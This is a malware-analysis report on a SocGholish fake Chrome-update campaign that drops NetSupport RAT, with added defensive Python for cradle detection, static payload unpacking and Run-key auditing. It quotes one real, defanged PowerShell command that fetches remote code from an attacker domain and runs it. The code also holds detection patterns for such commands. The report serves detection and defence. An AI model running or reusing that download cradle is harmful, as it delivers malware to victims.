New Drive-by Download Campaign Spying on Users
This malware framework uses several social-engineering themes, impersonating browser and program updates such as Chrome, Firefox, Flash Player, and Microsoft Teams.
Being infected with SocGholish may result in the deployment of malware such as the Cobalt Strike framework, ransomware, information stealers, RATs, etc.
The below figure depicts the infection chain used by the SocGholish framework.
Figure 1 – Infection chain of SocGholish
The infection chain begins once a user visits a compromised website that contains injected HTML code, which redirects them to a fake Chrome browser page luring them into "updating" their Chrome application.
Once the user clicks the “Update” button on the fake page, an archive file named “Сhrome.Updаte.zip” is downloaded and saved in the “Downloads” folder.
The below figure shows a fake Chrome browser update page and the downloaded zip archive file.
- "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h -c "iwr -usebasicparsing hxxp://aeoi[.]pl/15.ico |iex"
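The command line above is a textbook PowerShell download cradle: a hidden window (`-w h`), Invoke-WebRequest (`iwr`) fetching remote content, and the result piped straight into Invoke-Expression (`iex`) so nothing touches disk. The following is an added example, not code from the original post or from Cyble, of detection logic a defender could run over process-creation events from an EDR or Sysmon. The events it scans are constructed for illustration; the first one reuses the defanged command line reported above. The parent-process heuristic (script hosts such as wscript.exe) is an assumption added here, since the post does not name the process that launches PowerShell.

```python
import re

# Constructed sample process-creation events (EDR/Sysmon-style), not taken from
# the page. The first command line is the one reported in the post, defanged as
# there; the parent process names are assumptions for illustration.
SAMPLE_EVENTS = [
    {"parent": "wscript.exe",
     "cmd": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h -c "iwr -usebasicparsing hxxp://aeoi[.]pl/15.ico |iex"'},
    {"parent": "explorer.exe",
     "cmd": r'powershell.exe -NoProfile -File C:\Scripts\backup.ps1'},
    {"parent": "cmd.exe",
     "cmd": r'''powershell.exe -ep bypass -c "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://example.invalid/a.txt')"'''},
]

# Each pattern names one building block of a download cradle. PowerShell accepts
# abbreviated switches (-w for -WindowStyle, -ep for -ExecutionPolicy), so the
# patterns cover the short forms too.
REMOTE_FETCH = re.compile(
    r"\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|downloadfile|"
    r"downloaddata|net\.webclient|start-bitstransfer|curl|wget)\b", re.I)
EXEC_FETCHED = re.compile(r"\|\s*iex\b|\biex\b|\binvoke-expression\b", re.I)
HIDDEN_WINDOW = re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b", re.I)
POLICY_BYPASS = re.compile(r"-e(?:xecutionpolicy|xec|p)?\s+bypass\b", re.I)
URL = re.compile(r"\b(?:hxxps?|https?)://[^\s\"'<>]+", re.I)
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}  # assumed launchers


def analyse_command_line(cmd, parent=None):
    """Score one PowerShell command line and return the indicators it matched."""
    findings, score = [], 0
    fetch = bool(REMOTE_FETCH.search(cmd))
    execute = bool(EXEC_FETCHED.search(cmd))
    if fetch:
        findings.append("remote download primitive")
        score += 2
    if execute:
        findings.append("in-memory execution of fetched content")
        score += 2
    if HIDDEN_WINDOW.search(cmd):
        findings.append("hidden window")
        score += 1
    if POLICY_BYPASS.search(cmd):
        findings.append("execution policy bypass")
        score += 1
    if parent and parent.lower() in SCRIPT_HOSTS:
        findings.append(f"spawned by script host {parent}")
        score += 1
    # Fetch plus execute is the cradle itself and is rated high regardless of
    # the remaining score; the other indicators alone only raise suspicion.
    if fetch and execute:
        verdict = "high"
    elif score >= 2:
        verdict = "medium"
    else:
        verdict = "low"
    return {"cmd": cmd, "parent": parent, "score": score,
            "verdict": verdict, "findings": findings, "urls": URL.findall(cmd)}


def triage(events):
    """Analyse a batch of events and return them ordered by score, highest first."""
    results = [analyse_command_line(e["cmd"], e.get("parent")) for e in events]
    return sorted(results, key=lambda r: r["score"], reverse=True)


if __name__ == "__main__":
    for r in triage(SAMPLE_EVENTS):
        print(f"[{r['verdict']:6}] score={r['score']} parent={r['parent']}")
        for f in r["findings"]:
            print(f"          - {f}")
        for u in r["urls"]:
            print(f"          url: {u}")
```

The URLs pulled out of the command line (here left defanged, as the post prints them) are what you would pass to web-proxy or DNS blocking, while the `high` verdict is the alert condition; `medium` hits are worth a look but a hidden window alone is common in legitimate scheduled scripts.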
The new PowerShell script contains Base64-encoded streams that are decoded with the [System.Convert]::FromBase64String method and then gzip-decompressed using [System.IO.Compression.CompressionMode]::Decompress, as shown below.
The decoded and decompressed data contains the embedded payloads together with the code that drops the "NetSupport RAT" client, named "whost.exe", and its supporting files under the %Appdata% directory; "whost.exe" is then executed. The below figure shows the NetSupport client application along with its associated files.
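An analyst triaging a script like this wants to recover the embedded payloads without running the loader. The following is an added example, not the post's or Cyble's code: it pulls the literal passed to `FromBase64String(...)` out of the script text and repeatedly peels Base64 and gzip layers until neither applies, which is the same Base64-then-gzip unpacking the paragraph describes, done statically in Python. The loader it unpacks is a harmless stand-in built inside the script for demonstration, not the actual SocGholish script; the decompression is size-bounded so a malicious blob cannot exhaust memory.

```python
import base64
import binascii
import gzip
import io
import re

GZIP_MAGIC = b"\x1f\x8b"
MAX_DECOMPRESSED = 50 * 1024 * 1024  # refuse to inflate a decompression bomb
B64_CHARSET = re.compile(rb"[A-Za-z0-9+/=]+")
# Pulls the literal argument out of [System.Convert]::FromBase64String("...")
B64_ARG = re.compile(r"FromBase64String\(\s*['\"]([A-Za-z0-9+/=\s]+)['\"]\s*\)")


def build_sample_loader(inner_script: str) -> str:
    """Constructed stand-in for the loader described on the page: a harmless
    inner script, gzip-compressed and Base64-encoded, embedded in a PowerShell
    FromBase64String(...) call. Not the actual SocGholish script."""
    packed = base64.b64encode(gzip.compress(inner_script.encode("utf-8"))).decode("ascii")
    return (f'$data = [System.Convert]::FromBase64String("{packed}")\n'
            "# ... GzipStream with [System.IO.Compression.CompressionMode]::Decompress ...\n")


def gunzip_bounded(data: bytes) -> bytes:
    """gunzip with a hard cap on output size."""
    with gzip.GzipFile(fileobj=io.BytesIO(data)) as gz:
        out = gz.read(MAX_DECOMPRESSED + 1)
    if len(out) > MAX_DECOMPRESSED:
        raise ValueError("decompressed output exceeds safety limit")
    return out


def peel_layers(data: bytes, max_layers: int = 8):
    """Repeatedly undo Base64 and gzip encodings until neither applies.
    Returns (payload_bytes, names of the layers removed, outermost first)."""
    layers = []
    for _ in range(max_layers):
        if data[:2] == GZIP_MAGIC:
            data = gunzip_bounded(data)
            layers.append("gzip")
            continue
        compact = re.sub(rb"\s+", b"", data)
        # Only treat the blob as Base64 if it is reasonably long, padded to a
        # multiple of four and made only of Base64 characters; this keeps
        # short plain text (which can look like Base64) from being mangled.
        if len(compact) >= 16 and len(compact) % 4 == 0 and B64_CHARSET.fullmatch(compact):
            try:
                data = base64.b64decode(compact, validate=True)
            except (binascii.Error, ValueError):
                break
            layers.append("base64")
            continue
        break
    return data, layers


def unpack_loader(script_text: str):
    """Find every FromBase64String literal in a script and unpack it."""
    results = []
    for blob in B64_ARG.findall(script_text):
        payload, layers = peel_layers(blob.encode("ascii"))
        results.append({"layers": layers, "payload": payload})
    return results


if __name__ == "__main__":
    sample = build_sample_loader("Write-Output 'decoded payload'")
    for item in unpack_loader(sample):
        print("layers removed:", " -> ".join(item["layers"]))
        print("payload:", item["payload"].decode("utf-8", "replace"))
```

Recovered payloads that are themselves PE files (the dropped NetSupport client and its supporting files, in this campaign) can then be hashed and checked against your own IOC set, and any further Base64 literals in a recovered script can be fed back into `unpack_loader`.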
After dropping the payload, the PowerShell script creates a Run registry entry to ensure the executable "whost.exe" starts whenever the user logs on to the machine.
The below figure shows the registry key created to establish persistence of the NetSupport client “whost.exe”.
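A Run-key entry pointing at an executable under %Appdata% is the persistence artifact to hunt for. The following is an added example, not code from the post or from Cyble, that parses `reg query` output for a Run key and flags entries whose image lives in a user-writable location, with an analyst-maintained allowlist so that legitimate software installed under AppData (OneDrive, for instance) does not drown out the real hit. The registry dump it parses is constructed; the post says only that "whost.exe" is dropped under %Appdata% and given a Run entry, so the value name, user name and sub-folder shown here are assumptions.

```python
import re

# Constructed `reg query ...\Run` output, not taken from the page. The page
# reports only that the RAT client "whost.exe" is dropped under %Appdata% and
# given a Run entry; the value name, user name and sub-folder here are assumed.
SAMPLE_REG_QUERY = r"""
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    OneDrive    REG_SZ    "C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
    whost    REG_SZ    C:\Users\alice\AppData\Roaming\whost\whost.exe
    Vendor Tray    REG_SZ    "C:\Program Files\Vendor\Tray.exe"
"""

# Locations an unprivileged user can write to; a Run entry pointing here was
# not placed by an installer running as administrator.
USER_WRITABLE = re.compile(
    r"\\AppData\\|\\Users\\[^\\]+\\Downloads\\|\\Temp\\|\\ProgramData\\|\\Users\\Public\\|"
    r"%(?:APPDATA|LOCALAPPDATA|TEMP|TMP|USERPROFILE)%", re.I)

# Analyst-maintained allowlist: value name -> expected image path. The entry
# below is a constructed example; OneDrive legitimately lives under AppData.
KNOWN_GOOD = {
    "onedrive": re.compile(r"\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive\.exe$", re.I),
}


def extract_image_path(data: str) -> str:
    """Return the program path from a Run value's data, handling quoted paths
    followed by arguments and unquoted paths without spaces."""
    m = re.match(r'\s*"([^"]+)"', data)
    if m:
        return m.group(1)
    m = re.match(r"\s*(\S+?\.(?:exe|dll|bat|cmd|ps1|vbs|js|scr|com|pif))\b", data, re.I)
    return m.group(1) if m else data.strip()


def audit_run_entries(reg_text: str):
    """Parse `reg query` output and flag Run entries in user-writable paths
    that are not on the allowlist."""
    key, results = None, []
    for raw in reg_text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.upper().startswith("HKEY_"):
            key = line
            continue
        # reg query separates name, type and data with runs of spaces
        parts = re.split(r"\s{2,}", line, maxsplit=2)
        if len(parts) != 3:
            continue
        name, _vtype, data = parts
        image = extract_image_path(data)
        reasons = []
        if USER_WRITABLE.search(image):
            reasons.append("image under a user-writable location")
        known = KNOWN_GOOD.get(name.lower())
        if known and known.search(image):
            reasons = []  # matches the documented location for this entry
        results.append({"key": key, "name": name, "image": image,
                        "flagged": bool(reasons), "reasons": reasons})
    return results


if __name__ == "__main__":
    for entry in audit_run_entries(SAMPLE_REG_QUERY):
        mark = "!!" if entry["flagged"] else "  "
        print(f"{mark} {entry['name']:12} {entry['image']}")
        for reason in entry["reasons"]:
            print(f"      {reason}")
```

Feed it the output of `reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run` (and the HKLM and RunOnce variants) collected from hosts; flagged entries are candidates to hash and compare against your IOC set, not automatic verdicts, since the allowlist will never be complete.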
NetSupport Manager RAT
NetSupport Manager is a commercially available remote administration tool (RAT), typically used for legitimate purposes, that gives administrators remote access to users' computers. However, the legitimate application can also be abused by TAs to gain unauthorized access to compromised systems.
Upon execution of the “NetSupport RAT”, it attempts to identify the victim’s geo-location by contacting the following URL:
We also observed that the installed RAT sends victim information in an encrypted format with POST requests to the following Command-and-Control server URL:
The figure below shows the network communication established to send the victim’s information to the TA’s C&C server.
After compromising a victim machine, the TAs can perform several malicious activities such as monitoring the victim’s system, transferring files, launching applications, identifying the system location, remotely retrieving inventory and system information, etc.
Threat Actors use various techniques to deploy their malicious payloads onto victim systems. Over the course of our research, we observed TAs using the Fake Browser Update (SocGholish) framework to deliver the NetSupport RAT.
When downloading files from the internet, users should confirm that the downloaded content originated from a legitimate source and not from a suspicious site. Software applications such as web browsers typically notify users about updates within the application itself and do not distribute updates through third-party websites.
Cyble Research & Intelligence Labs actively monitors new malicious campaigns and keeps our readers updated with our latest findings.
- Refrain from opening untrusted links and email attachments without first verifying their authenticity.
- Educate employees on protecting themselves from threats such as phishing and untrusted URLs.
- Avoid downloading files from unknown websites.
- Use strong passwords and enforce multi-factor authentication wherever possible.
- Turn on the automatic software update feature on your computer, mobile, and other connected devices.
- Use a reputable antivirus and internet security software package on your connected devices, including PCs, laptops, and mobile devices.
- Block URLs that could spread the malware, e.g., Torrent/Warez.
- Monitor beacons at the network level to block data exfiltration by malware or TAs.
- Enable Data Loss Prevention (DLP) Solutions on the employees’ systems.
MITRE ATT&CK® Techniques
| Tactic | Technique ID | Technique Name |
| --- | --- | --- |
| Initial Access | T1189 | Drive-by Compromise |
| Execution | T1204 | User Execution |
| Persistence | T1547 | Registry Run Keys / Startup Folder |
| Privilege Escalation | T1574 | DLL Side-Loading |
| Defense Evasion | T1027 | Obfuscated Files or Information |
| Defense Evasion | T1140 | Deobfuscate/Decode Files or Information |
| Discovery | T1082 | System Information Discovery |
| Command and Control | T1219 | Remote Access Software |
| Command and Control | T1105 | Ingress Tool Transfer |
Indicators of Compromise (IOCs)
Archive file “Сhrome.Updаte.zip”